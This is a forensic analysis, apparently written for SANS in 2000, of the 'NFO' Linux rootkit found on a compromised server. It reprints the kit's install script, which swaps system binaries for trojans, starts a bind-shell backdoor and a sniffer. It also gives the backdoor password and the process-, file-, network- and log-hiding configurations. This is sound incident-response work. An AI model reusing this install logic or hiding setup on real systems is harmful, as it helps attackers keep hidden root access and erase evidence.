Analysis of N.F.O hacking- / rootkit
08/03/2000

This kit I'm about to analyze is a root- / hackingkit that was found on a compromised machine running RedHat 5.2 and was probably rooted using a rootexploit exploiting the POP2 daemon (version 4.46). 

If you have any more information or insights, please send us a note at intrusion@sans.org.

The Tools
The dir where this kit was found was /usr/include/rpc/".. "
They installed a few backdoors and trojans into the system that gives them root access and hides theirselfs.. These are the files that were found in the directory I mentioned before.

slimsheet:~/nfo# ls -al

drwxr-xr-x 9 root root 4096 Dec 31 23:31 kit2/
-rw-r--r-- 1 root root 459397 Oct 27 14:35 kit_OUT_99.tgz
-rwxr-xr-x 1 ftp 50 13766 Nov 21 21:36 t666*
-rwxr-xr-x 1 root root 106096 Nov 20 05:26 wget*

slimsheet:~/nfo# ls -al kit2/
-rwxr-xr-x 1 root root 13762 Dec 10 20:55 admbind*
drwxr-xr-x 2 root root 4096 Sep 29 18:32 bd/
drwxr-xr-x 2 root root 4096 Jan 2 22:23 bnc/
-rwxr-xr-x 1 root root 1059 Oct 3 01:49 install*
drwxr-xr-x 2 root root 4096 Sep 29 18:32 pty/
-rw-r--r-- 1 root root 1 Dec 31 23:32 readme
drwxr-xr-x 2 root root 4096 Dec 5 21:44 resetlog/
drwxr-xr-x 2 root root 4096 Dec 31 23:30 scans/
drwxr-xr-x 2 root root 4096 Sep 29 18:32 sniff/
drwxr-xr-x 2 root root 4096 Sep 30 16:21 trojans/

Analysis
3 files were found in the directory, their names were kit_OUT_99.tgz, t666 & wget. The file kit_OUT_99.tgz was the original ziped kit that put itself into ./kit2/ when you untar'ed it. wget is used to receive files from other servers at Internet. t666 is a bind/named remote exploit for mostly every OS out there, it exploits the bind 8.2.(X) version. If we enter the directory kit2 we'll find 3 more files in the same directory, admbind, install & readme. Admbind is what I believe a remote exploit for the bind version. The readme file is where the sniffer ./sniff/lins logs all connections but this file was on 0 kb. The Install file is a /bin/sh shell script that looks like this : 

#!/bin/sh
#backup
echo "Instalacao do Kit NFO GROUP v1.5"
if [ "$1" != "-install" ]; then
echo "Use: ./install -install" ; echo ""
exit
fi
echo -n "[*] Iniciando Backup..."
/bin/cp /bin/ls /usr/doc/.sl
/bin/cp /bin/ps /usr/doc/.sp
/bin/cp /bin/netstat /usr/doc/.statnet
/bin/cp /usr/sbin/syslogd /usr/doc/.logdsys
/bin/cp /usr/sbin/tcpd /usr/doc/.dpct
/bin/cp /sbin/ifconfig /usr/doc/.gifnocfi
/bin/cp /usr/bin/find /usr/doc/.dnif
/bin/cp /bin/login /usr/doc/.nigol
echo "ok"

# instalacao
echo -n "[*] Iniciando instalacao..."
/bin/cp -f trojans/ls.trj /bin/ls
/bin/cp -f trojans/ps.trj /bin/ps
/bin/cp -f trojans/netstat.trj /bin/netstat
/bin/cp -f trojans/syslogd.trj /usr/sbin/syslogd
/bin/cp -f trojans/tcpd.trj /usr/sbin/tcpd
/bin/cp -f trojans/ifconfig.trj /sbin/ifconfig
/bin/cp -f trojans/find.trj /usr/bin/find
/bin/cp -f trojans/login.trj /bin/login
/bin/cp -f pty/pty* /dev/
echo "ok"
echo -n "[*] Instalando backdoor..."
./bd/biba 14789632159 lal
echo "ok"
echo -n "[*] Sniffando..."
./sniff/lins 
echo "ok"
echo "Instalacao completa :-)"
exit

The directory ./bd/ includes one file called biba. It's the binary from what I believe is a bindshell.c copy. When it's executed by the install file it will put itself on port 14789632159. When you execute ./biba you'll receive the following :

and if you do : 
# ./biba 31337 syslogd

It will bind a rootshell to port 31337 and it will look like it's syslogd running when root execute a ps aux. What this program do is that it sits on the port you specify and listen for connections, if you connect to it using a telnet application you'll not be given any text or anything like that, it will only wait for a password, if you enter the correct password, you'll receive a /bin/bash prompt with uid=0 (root). I managed to find the password for this binary using a simple "strings biba" and I found out that the password was #N#F#O#G

If we change directory to ./bnc/ we'll find a normal precompiled bouncer for IRC use and a file called bnc.conf which is the config file that are used by the binary "bnc". If we do a simple "cat bnc.conf" we'll receive the following :

pt:54123            <-------- This is the port the bouncer will listen for connections on.
ps:ziggylinda       <-------- This is the password you need to enter to use the bouncer.
mu:3                   <-------- This is the "Max User" selection, this means only 3 connections at the time.
dp:6667              <-------- Default IRC port to connect to is 6667 in this case. 

When we move on we'll find an interesting directory called ./pty/. In this directory are four files found, ptyp, ptyq, ptyr & ptys. All thoose belongs to the rootkit & various trojans, these are later moved to /dev. If we start with cat'ing we'll get the following :

2 lins
3 biba
3 sadan
3 lal
3 cleans
3 z2
3 readme
3 in.telnetd
3 promisc
3 cat
3 grep
3 bash
3 sh
3 bnc
3 rpcscan
3 z0ne
This is the "Process hiding" file and everything that has a 3 infront of them will hide everything containing that string in a /bin/ps section. For example, when it say 3 biba in the file will hide everything string containing biba when you execute /bin/ps. When it say for example, 2 lins it will hide all applications matching the string lins.

The next file is ptyq and is the hiding file for netstat. It will remove tcp/udp/sockets from or to specified addresses, uids and ports. If we cat it it will look like :

0 0
1 200.241
1 200.244
1 200.243
1 200.242
1 expert.com.br
1 interconect.com.br
1 amazonline.com.br
1 libnet.com.br
2 200.241
2 200.242
2 200.240
2 200.243
2 200.242
2 libnet.com.br
2 amazonline.com.br
2 interconect.com.br
2 amazonline.com.br
2 14789632159
2 988889
3 14789632159
3 988889
5 /usr/include/rpc/".. "/kit/

Taken from the Readme for lrk (Linux RootKit):
        type 0: hide uid
        type 1: hide local address
        type 2: hide remote address
        type 3: hide local port
        type 4: hide remote port
        type 5: hide UNIX socket path

With this we see that the attackers wan't to hide all connections from 200.241-244 and the domains libnet.com.br, expert.com.br, amazonline.com.br,  interconect.com.br. Probably these are ISPs and it will be much easier to look for suspicious connections when we know from what domains they may come. 

The next file is ptyr. Every name in this file will be hidden from ls / du. If we cat ptyr we'll get the following :
ptyp
ptyq
ptyr
ptys
..

As you may notice thoose pty* files are hidden & also the directory were the attacker(s) stored all the files. 

Next and last file is ptys and will hide the addresses in the file from syslogd. The contents of ptys were :
200.244
200.245
200.241
200.242
expert.com.br
interconect.com.br
amazonline.com.br
libnet.com.br

Now the attackers are sure that no connections from their hosts will be logged into the /var/log/* files or any other files syslogd may log to. 

If we enter the directory resetlog we'll see 6 files. I won't display any files here as they are mainly large & are made to clean logs. If I do "head -n 5 sadan" we would receive the following :
# [-] Sadan del log v 5.0 - BETA
# [-] written by the_sphinx to NFO group '99
# [-] ninefortyone@hotmail.com

#!/bin/bash

As you see it's a shellscript made by _sphinx for NFO group 99, It seems that he can be reached at ninefortyone@hotmail.com if you need to contact him concerning his "cleaning-logs-skills". There's another file called sadan-4_0-pt.sh in the same directory and we found this in the file :

echo; echo ; echo "[S] SADAN del log 4.0 - PORTUGUES"
echo "[S] sysdenial - tdoors@mailbr.com.br"
echo "[S] NFO Group OwnZ - Brazil - Out/99"

Yet another guy making scripts for log cleaning. I also have to mark that I doubt "NFO Group OwnZ".

The next directory we enter is a directory called scans and it's from this dir all the network scans have been made. When we found this kit there were only two files in this directory, rpcscan & z0ne. z0ne is a tool to gather ips from a top domain, eg. to gather all ips of *.edu. In the directory resetlog we found a file called .logs which was a simple "find / -name *log* > .logs and in this file we found the following entries :

/usr/include/rpc/.. /kit2/scans/mc.log.qpop
/usr/include/rpc/.. /kit2/scans/no.log.qpop
/usr/include/rpc/.. /kit2/scans/no.log
/usr/include/rpc/.. /kit2/scans/200.log

Here we see that the hacker have been scanning *.no & the class A network 200.x.x.x for vurnabilities. We also notice that someone scanned *.no & (maybe) *.mc for vurnable versions of QPOP.

The next directory was called sniff and included two files, lins which was a Ethernet Packet sniffer which default logging file was ./readme. There were also a file called promisc which is a public software being used to find sniffers at all Network interfaces, eth0, eth1, etc, etc. 

As you see in the file called "install" that I showed at the beginning these files are replacements for the original binaries. Notice that these are trojaned ONCE!

Network detection of this intrusion
The detection of this intrusion was fairly easy but it shows that a skilled administrator knows what's happening on his machine. The Administrator found a application named "bnc" running as uid=0 (root) and he simply did "find / -name *bnc*" and found that secret directory I mentioned before,He noticed that he had been compromised and handled it very well. 

Conclusion 
I hope this analysis will help administrators in the future to detect intrusion on their networks and I hope they realized that it's not hard for hackers to hide theirselfs in a compromised system. This is only a simple example but I hope it will help.

Additional comments
As usuall, a compromise like this would easily been detected on a host running file-scanning software such as tripwire. But this just shows us that there are skilled administrators out there and I'm happy to see such a thing. I also wan't you to notice that I only pasted parts of the files from the rootkit, this hacking- / rootkit have been sent to SANS and they will publish it if they feel like it's necessary. 

Last modified: 08/03/2000 
Author: Fredrik Ostergren (fredrik.ostergren@freebox.com